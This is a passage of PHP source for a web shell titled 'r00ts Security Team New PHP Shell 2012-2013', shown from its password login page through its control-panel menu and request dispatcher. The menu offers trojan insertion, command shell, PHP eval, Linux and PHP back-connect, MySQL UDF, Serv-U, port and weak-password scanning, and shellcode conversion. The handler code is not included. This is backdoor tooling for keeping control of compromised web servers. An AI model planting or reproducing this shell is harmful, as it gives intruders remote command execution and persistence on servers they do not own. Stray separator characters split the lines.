$out = $shell1->RegDelete($dpath);
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
function Root_Login($MSG_TOP)
|
|||
|
|
{
|
|||
|
|
global $lanip;
|
|||
|
|
print<<<END
|
|||
|
|
|
|||
|
|
<html>
|
|||
|
|
<body style="background:#FFFFF;">
|
|||
|
|
<center>
|
|||
|
|
<form method="POST">
|
|||
|
|
<div style="width:551px;height:201px;margin-top:100px;background:threedface;border-color: #000000 #999999 #FFFFF;border-style:solid;border-width:1px;">
|
|||
|
|
<div style="width:550px;height:22px;padding-top:2px;color:#FFFFFF;background:#000000;clear:both;"><b>{$MSG_TOP}</b></div>
|
|||
|
|
<div style="width:550px;height:80px;padding-top:30px;color:;clear:both;">PASS:<input type="password" name="b4che10rpass" style="width:200px;height:20px"></div>
|
|||
|
|
<div style="width:550px;height:50px;clear:both;"><input class="bt" type="submit" value="login"></div>
|
|||
|
|
<h5>@Copyright spider Clean Backdoor and plus & modify by r00ts Security Team<h5>
|
|||
|
|
<h5>Your IP : {$lanip} <h5>
|
|||
|
|
</div>
|
|||
|
|
</form>
|
|||
|
|
</center>
|
|||
|
|
</body>
|
|||
|
|
</html>
|
|||
|
|
END;
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function WinMain()
|
|||
|
|
{
|
|||
|
|
$Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
|
|||
|
|
$Server_OS = PHP_OS;
|
|||
|
|
$Server_Soft = $_SERVER["SERVER_SOFTWARE"];
|
|||
|
|
print<<<END
|
|||
|
|
<html>
|
|||
|
|
<title> r00ts Security Team New PHP Shell 2012-2013 </title>
|
|||
|
|
<head>
|
|||
|
|
<style type="text/css">
|
|||
|
|
*{padding:0; margin:0;}
|
|||
|
|
body{background:#FFFFF;font-family:"Verdana", "Tahoma", sans-serif; font-size:13px;margin:0 auto; text-align:center;margin-top:5px;word-break:break-all;}
|
|||
|
|
.outtable {height:600px;width:%90;color:#000000;border-top-width: 2px;border-right-width: 2px;border-bottom-width: 2px;border-left-width: 2px;border-top-style: outset;border-right-style: outset;border-bottom-style: outset;border-left-style: outset;border-top-color: #FFFFFF;border-right-color: #8c8c8c;border-bottom-color: #8c8c8c;border-left-color: #FFFFFF;background-color: threedface;}
|
|||
|
|
.topbg {padding-top:3px;text-align: left;font-size:12px;font-weight: bold;height:22px;width:950px;color:#FFFFFF;background: #293F5F;}
|
|||
|
|
.bottombg {padding-top:3px;text-align: center;font-size:12px;font-weight: bold;height:22px;width:950px;color:#000000;background: #888888;}
|
|||
|
|
.listbg {font-family:'lucida grande',tahoma,helvetica,arial,'bitstream vera sans',sans-serif;font-size:13px;width:130px;}
|
|||
|
|
.listbg li{padding:3px;color:#000000;height:25px;display:block;line-height:26px;text-indent:0px;}
|
|||
|
|
.listbg li a{padding-top:2px;background:#BBBBBB;color:#000000;height:25px;display:block;line-height:24px;text-indent:0px;border-color:#999999 #999999 #999999 #999999;border-style:solid;border-width:1px;text-decoration:none;}
|
|||
|
|
</style>
|
|||
|
|
<script language="JavaScript">
|
|||
|
|
function switchTab(tabid)
|
|||
|
|
{
|
|||
|
|
if(tabid == '') return false;
|
|||
|
|
for(var i=0;i<=17;i++)
|
|||
|
|
{
|
|||
|
|
if(tabid == 't_'+i) document.getElementById(tabid).style.background="#FFFFFF";
|
|||
|
|
else document.getElementById('t_'+i).style.background="#BBBBBB";
|
|||
|
|
}
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
</head>
|
|||
|
|
<body>
|
|||
|
|
<div class="outtable">
|
|||
|
|
<div class="topbg"> {$Server_IP} - {$Server_OS} </div>
|
|||
|
|
<div style="height:546px;">
|
|||
|
|
<table width="100%" height="100%" border=0 cellpadding="0" cellspacing="0">
|
|||
|
|
<tr>
|
|||
|
|
<td width="140" align="center" valign="top">
|
|||
|
|
<ul class="listbg">
|
|||
|
|
<li><a href="?s=a" id="t_0" onclick="switchTab('t_0')" style="background:#FFFFFF;" target="main"> File Manager </a></li>
|
|||
|
|
<li><a href="?s=b" id="t_1" onclick="switchTab('t_1')" target="main"> Insert Trojan </a></li>
|
|||
|
|
<li><a href="?s=c" id="t_2" onclick="switchTab('t_2')" target="main"> Clean Trojan </a></li>
|
|||
|
|
<li><a href="?s=d" id="t_3" onclick="switchTab('t_3')" target="main"> Bulk Replace </a></li>
|
|||
|
|
<li><a href="?s=e" id="t_4" onclick="switchTab('t_4')" target="main"> Search Trojan </a></li>
|
|||
|
|
<li><a href="?s=u" id="t_21" onclick="switchTab('t_21')" target="main"> Search File</a></li>
|
|||
|
|
<li><a href="?s=v" id="t_22" onclick="switchTab('t_22')" target="main"> FTP Connector</a></li>
|
|||
|
|
<li><a href="?s=f" id="t_5" onclick="switchTab('t_5')" target="main"> Server Info </a></li>
|
|||
|
|
<li><a href="?s=g" id="t_6" onclick="switchTab('t_6')" target="main"> CmdShell </a></li>
|
|||
|
|
<li><a href="?s=h" id="t_7" onclick="switchTab('t_7')" target="main"> Win API </a></li>
|
|||
|
|
<li><a href="?s=i" id="t_8" onclick="switchTab('t_8')" target="main"> Scan Port </a></li>
|
|||
|
|
<li><a href="?s=j" id="t_9" onclick="switchTab('t_9')" target="main"> Convert Shellcode </a></li>
|
|||
|
|
<li><a href="?s=k" id="t_10" onclick="switchTab('t_10')" target="main"> Weak Scan </a></li>
|
|||
|
|
<li><a href="?s=l" id="t_11" onclick="switchTab('t_11')" target="main">Linux Back Connect </a></li>
|
|||
|
|
<li><a href="?s=r" id="t_12" onclick="switchTab('t_12')" target="main">PHP Back Connect </a></li>
|
|||
|
|
<li><a href="?s=m" id="t_13" onclick="switchTab('t_13')" target="main"> Mysql UDF </a></li>
|
|||
|
|
<li><a href="?s=n" id="t_14" onclick="switchTab('t_14')" target="main"> Mysql statement </a></li>
|
|||
|
|
<li><a href="?s=o" id="t_15" onclick="switchTab('t_15')" target="main">Win Reg Shell </a></li>
|
|||
|
|
<li><a href="?s=z" id="t_16" onclick="switchTab('t_16')" target="main">Serv-U </a></li>
|
|||
|
|
<li><a href="?s=x" id="t_17" onclick="switchTab('t_17')" target="main"> Eval PHP Code </a></li>
|
|||
|
|
<li><a href="?s=w" id="t_18" onclick="switchTab('t_18')" target="main"> Other DB Connect </a></li>
|
|||
|
|
<li><a href="?s=logout" id="t_20" onclick="switchTab('t_20')"> Logout </a></li>
|
|||
|
|
</ul>
|
|||
|
|
</td>
|
|||
|
|
<td>
|
|||
|
|
<iframe name="main" src="?s=a" width="100%" height="100%" frameborder="0"></iframe>
|
|||
|
|
</td>
|
|||
|
|
</tr>
|
|||
|
|
</table>
|
|||
|
|
</div>
|
|||
|
|
<div class="bottombg"> {$Server_Soft} </div>
|
|||
|
|
</div>
|
|||
|
|
</body>
|
|||
|
|
</html>
|
|||
|
|
END;
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
if(get_magic_quotes_gpc())
|
|||
|
|
{
|
|||
|
|
$_GET = Root_GP($_GET);
|
|||
|
|
$_POST = Root_GP($_POST);
|
|||
|
|
}
|
|||
|
|
if($_GET['s'] == 'logout')
|
|||
|
|
{
|
|||
|
|
setcookie('admin_b4che10rpass',NULL);
|
|||
|
|
die('<meta http-equiv="refresh" content="0;URL=?">');
|
|||
|
|
}
|
|||
|
|
if($_COOKIE['admin_b4che10rpass'] != md5($password))
|
|||
|
|
{
|
|||
|
|
ob_start();
|
|||
|
|
$MSG_TOP = 'LOGIN';
|
|||
|
|
if(isset($_POST['b4che10rpass']))
|
|||
|
|
{
|
|||
|
|
$cookietime = time() + 24 * 3600;
|
|||
|
|
setcookie('admin_b4che10rpass',md5($_POST['b4che10rpass']),$cookietime);
|
|||
|
|
if(md5($_POST['b4che10rpass']) == md5($password)){die('<meta http-equiv="refresh" content="1;URL=?">');}
|
|||
|
|
else{$MSG_TOP = 'This is my privileges, What are you doing man ?';}
|
|||
|
|
|
|||
|
|
}
|
|||
|
|
Root_Login($MSG_TOP);
|
|||
|
|
exit();
|
|||
|
|
ob_end_flush();
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
if(isset($_GET['s'])){$s = $_GET['s'];if($s != 'a' && $s != 'n')Root_CSS();}else{$s = 'MyNameIsHacker';}
|
|||
|
|
$p = isset($_GET['p']) ? $_GET['p'] : File_Str(dirname(__FILE__));
|
|||
|
|
|
|||
|
|
switch($s)
|
|||
|
|
{
|
|||
|
|
case "a" : File_a($p); break;
|
|||
|
|
case "b" : Guama_b(); break;
|
|||
|
|
case "c" : Qingma_c(); break;
|
|||
|
|
case "d" : Tihuan_d(); break;
|
|||
|
|
case "e" : Antivirus_e(); break;
|
|||
|
|
case "f" : Info_f(); break;
|
|||
|
|
case "g" : Exec_g(); break;
|
|||
|
|
case "h" : Com_h(); break;
|
|||
|
|
case "i" : Port_i(); break;
|
|||
|
|
case "j" : Shellcode_j(); break;
|
|||
|
|
case "k" : Crack_k(); break;
|
|||
|
|
case "l" : Linux_l(); break;
|
|||
|
|
case "m" : Mysql_m(); break;
|
|||
|
|
case "n" : Mysql_n(); break;
|
|||
|
|
case "o" : phpreg(); break;
|
|||
|
|
case "p" : File_Edit($_GET['fp'],$_GET['fn']); break;
|
|||
|
|
case 'x' : phpcode();break;
|
|||
|
|
case 'r' : phpsocket();break;
|
|||
|
|
case 'w' : otherdb();break;
|
|||
|
|
case 'z' : su();break;
|
|||
|
|
case 'u' : Findfile_j(); break;
|
|||
|
|
case 'v' : ftp_php();break;
|
|||
|
|
default: WinMain(); break;
|
|||
|
|
}
|
|||
|
|
?>
|